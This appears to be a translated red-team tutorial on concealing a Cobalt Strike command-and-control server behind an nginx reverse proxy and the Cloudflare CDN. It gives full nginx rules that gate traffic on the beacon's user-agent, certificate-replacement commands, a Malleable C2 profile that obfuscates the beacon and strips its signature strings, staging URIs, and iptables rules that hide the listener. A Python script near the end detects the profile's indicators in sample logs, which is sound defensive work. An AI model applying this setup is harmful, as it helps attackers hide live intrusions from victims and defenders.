Hiding a C2
Hiding the C2 server behind an nginx reverse proxy and a CDN
First register a Cloudflare account, then at your domain registrar point the domain's nameservers at Cloudflare's, and add an A record for the CS server in Cloudflare.
Free domain provider: https://www.freenom.com/
Reverse proxy setup: install nginx and configure a reverse proxy to hide the server (skip this step if you are not using a reverse proxy)
apt install nginx
Open the nginx config file (/etc/nginx/nginx.conf) and add the key settings; the two server blocks below go inside the http { } block:
server {
    listen 443 ssl default_server;
    server_name abc123.com www.abc123.com;
    ssl_certificate /usr/local/nginx/cert/abc123.com/public.pem;       # certificate (public key)
    ssl_certificate_key /usr/local/nginx/cert/abc123.com/private.key;  # private key
    location / {
        index index.html;
        root /usr/share/nginx/html;
    }
}
server {
    # CS check-in settings
    set $C2_SERVER https://127.0.0.1:2083;     # when the beacon is HTTPS the IP must be 127.0.0.1
    set $REDIRECT_DOMAIN https://google.com;
    # set $REDIRECT_DOMAIN https://baidu.com;
    listen 443 ssl;   # only one server block per port may be default_server; the decoy block above is it
    server_name *.abc123.com;   # your domain
    ssl_certificate /usr/local/nginx/cert/abc123.com/public.pem;       # certificate (public key)
    ssl_certificate_key /usr/local/nginx/cert/abc123.com/private.key;  # private key
    # forward CS check-ins
    location / {
        if ($http_user_agent != "Mozilla/5.0 (Windows NT 6.1; Trident/8.0; rv:12.0)") {
            return 302 $REDIRECT_DOMAIN$request_uri;
        }
        proxy_pass $C2_SERVER;
        # If you want to pass the C2 server's "Server" header through then uncomment this line
        # proxy_pass_header Server;
        expires off;
        proxy_redirect off;
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;   # forward the source IP so the C2 sees the real external IP
        proxy_set_header X-Real-IP $remote_addr;
    }
}
nginx will only start cleanly once the certificates below are in place; until then, comment out the certificate directives.
Changing the certificate configuration
CS ships with three default keystores (cobaltstrike.store, proxy.store, ssl.store):
cobaltstrike.store: encrypts traffic between the team server and the client. proxy.store: used for the browser proxy, i.e. the browser pivot feature. ssl.store: if no https-certificate option is configured and an HTTPS listener is used, CS falls back to this certificate.
You can inspect CS's default certificate; its features are very obvious:
keytool -list -v -keystore cobaltstrike.store
Create a certificate with Cloudflare.
Tune the configuration so the CDN bypasses caching; the rule URLs are:
abc123.com/*
and *.abc123.com/*
In everything below, abc123.com stands for your own domain.
It is recommended to change the certificate password 123456 to something more complex.
Put the certificate and its private key at
/usr/local/nginx/cert/public.pem
and /usr/local/nginx/cert/private.key
respectively (the nginx config above references them under /usr/local/nginx/cert/abc123.com/, so keep the two consistent), then recreate the store with openssl and keytool:
openssl pkcs12 -export -in /usr/local/nginx/cert/public.pem -inkey /usr/local/nginx/cert/private.key -out abc123.com.p12 -name abc123.com -passout pass:123456
keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore abc123.com.store -srckeystore abc123.com.p12 -srcstoretype PKCS12 -srcstorepass 123456 -alias abc123.com
Edit the teamserver launch script to use the newly created
abc123.com.store
and update the certificate password there. Then take a profile template from the https://github.com/rsmudge/Malleable-C2-Profiles project; the configuration is as follows:
Replace abc123.com with your own domain and change the certificate password.
# default sleep time is 60s
set sleeptime "10000";
# jitter factor 0-99% [randomize callback times]
set jitter "0";
set maxdns "255";
stage {
    set stomppe "true";
    set obfuscate "true";
    set cleanup "true";
    set sleep_mask "true";
    transform-x86 {
        prepend "\x90\x90\x90";
        strrep "ReflectiveLoader" "";
        strrep "beacon" "";
    }
    transform-x64 {
        prepend "\x90\x90\x90";
        strrep "ReflectiveLoader" "";
        strrep "beacon" "";
    }
}
https-certificate {
    set keystore "abc123.com.store";   # keystore name
    set password "123456";             # keystore password
}
# the block above can be left out until a domain and certificate are configured
http-config {
    set headers "Content-Type";
    header "Content-Type" "text/html;charset=UTF-8";   # prevents commands failing to execute
    set trust_x_forwarded_for "true";
}
set useragent "Mozilla/5.0 (Windows NT 6.1; Trident/8.0; rv:12.0)";   # must match the UA the nginx rule checks; used for identification so other traffic is not forwarded
http-get {
    set uri "/milu_image/";
    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        #header "Host" "abc123.com";   # your domain; keep this line commented out until Cloudflare is configured
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        metadata {
            netbios;
            append ".jpg";   # suffix appended to the transmitted data
            uri-append;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;   # encoding (base64, base64url, netbios, netbiosu)
            print;
        }
    }
}
http-post {
    set uri "/milu_email/ /updates.rs /infot.gif /cnaid.jpg /cusid.jpg";
    client {
        header "Content-Type" "application/octet-stream";
        #header "Host" "abc123.com";   # your domain; keep this line commented out until Cloudflare is configured
        header "Referer" "http://www.google.com";
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        id {
            netbiosu;
            append ".png";
            uri-append;
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}
# staging: after the small payload lands it downloads the full beacon; the traffic of that download request is defined by http-stager
http-stager {
    set uri_x86 "/get32.gif";
    set uri_x64 "/get64.gif";
    client {
        parameter "id" "1234";
        header "Cookie" "SomeValue";
    }
    server {
        header "Content-Type" "image/gif";
        output {
            prepend "GIF89a";
            print;
        }
    }
}
Once configured, name the file
abc123.com.profile
To prevent the listener port from being traced, restrict access to it:
iptables -I INPUT -p TCP --dport 2083 -j DROP
iptables -I INPUT -s 127.0.0.1 -p TCP --dport 2083 -j ACCEPT
# remove the rules
iptables -D INPUT -p TCP --dport 2083 -j DROP
iptables -D INPUT -s 127.0.0.1 -p TCP --dport 2083 -j ACCEPT
Start CS on the server:
./teamserver x.x.x.x password abc123.com.profile
The ports Cloudflare's free plan will proxy through the CDN are:
HTTP:
80, 8080, 8880, 2052, 2082, 2086, 2095
HTTPS:
443, 2053, 2083, 2087, 2096, 8443
Without the reverse proxy: (screenshot not preserved)
With the reverse proxy: (screenshot not preserved)
OK, with the reverse proxy in place a normal user visiting the domain is redirected to Google, the real IP stays hidden, and even an nmap scan shows nothing abnormal. Only requests carrying the CS features (the UA header, or the access path, which this article does not gate on) are proxied by nginx to the configured C2 port; the connection seen on the compromised host is
abc123.com:443
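The same static values that make this setup work, the gate UA in the nginx rule and the fixed URI prefixes plus netbios-encoded path segments in the profile, are exactly what a defender can match on in web or proxy logs. The following is an added example (not code from the original post) that runs those checks over constructed nginx access-log lines; the IPs, timestamps and encoded segments are made up, and the netbios decoder reverses CS's documented transform (two letters a-p or A-P per byte):

```python
import re
from urllib.parse import urlsplit

# Indicators copied from this page's nginx rule and Malleable profile
PROFILE_UA = "Mozilla/5.0 (Windows NT 6.1; Trident/8.0; rv:12.0)"
GET_PREFIX = "/milu_image/"  # http-get: netbios metadata, ".jpg" appended, uri-append
POST_URIS = ("/milu_email/", "/updates.rs", "/infot.gif", "/cnaid.jpg", "/cusid.jpg")
STAGER_URIS = ("/get32.gif", "/get64.gif")
LOG_RE = re.compile(  # nginx "combined" access-log format
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def netbios_decode(seg: str, base: str = "a") -> bytes:
    """Undo the netbios ('a'-'p') or netbiosu ('A'-'P') transform: two letters per byte."""
    if len(seg) % 2 or not re.fullmatch("[%s-%s]+" % (base, chr(ord(base) + 15)), seg):
        raise ValueError("segment is not netbios-encoded")
    b = ord(base)
    return bytes(((ord(seg[i]) - b) << 4) | (ord(seg[i + 1]) - b) for i in range(0, len(seg), 2))

def _encoded_between(path, prefix, suffix, base):  # prefix + netbios data + suffix (uri-append shape)
    if not (path.startswith(prefix) and path.endswith(suffix)):
        return False
    try:
        netbios_decode(path[len(prefix):-len(suffix)], base)
        return True
    except ValueError:
        return False

def classify(line: str) -> list:
    """Return the profile indicators a single access-log line matches (empty list if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, hits = urlsplit(m["path"]).path, []
    if m["ua"] == PROFILE_UA:  # the static UA nginx gates on is itself a signature
        hits.append("profile-ua")
    if _encoded_between(path, GET_PREFIX, ".jpg", "a"):
        hits.append("netbios-metadata-get")
    if m["method"] == "POST" and any(_encoded_between(path, u, ".png", "A") for u in POST_URIS):
        hits.append("netbiosu-id-post")
    if path in STAGER_URIS:
        hits.append("stager-uri")
    return hits

# Constructed sample log (not real traffic): normal visitor, stager fetch, check-in, POST
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:00:00:01 +0000] "GET / HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/120.0"',
    '198.51.100.7 - - [01/Jan/2024:00:00:02 +0000] "GET /get64.gif?id=1234 HTTP/1.1" 200 4096 "-" "' + PROFILE_UA + '"',
    '198.51.100.7 - - [01/Jan/2024:00:00:12 +0000] "GET /milu_image/aabapp.jpg HTTP/1.1" 200 0 "http://www.google.com" "' + PROFILE_UA + '"',
    '198.51.100.7 - - [01/Jan/2024:00:00:13 +0000] "POST /updates.rsAABAPP.png HTTP/1.1" 200 0 "http://www.google.com" "' + PROFILE_UA + '"',
]
```

Real metadata segments are far longer (the RSA-encrypted blob is 128 bytes, so 256 letters), which is why an all-lowercase a-p path of even length right before a static extension stands out even without the UA.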
VNC
To use the VNC feature, the VNC port must be set to one of the ports Cloudflare allows to be proxied.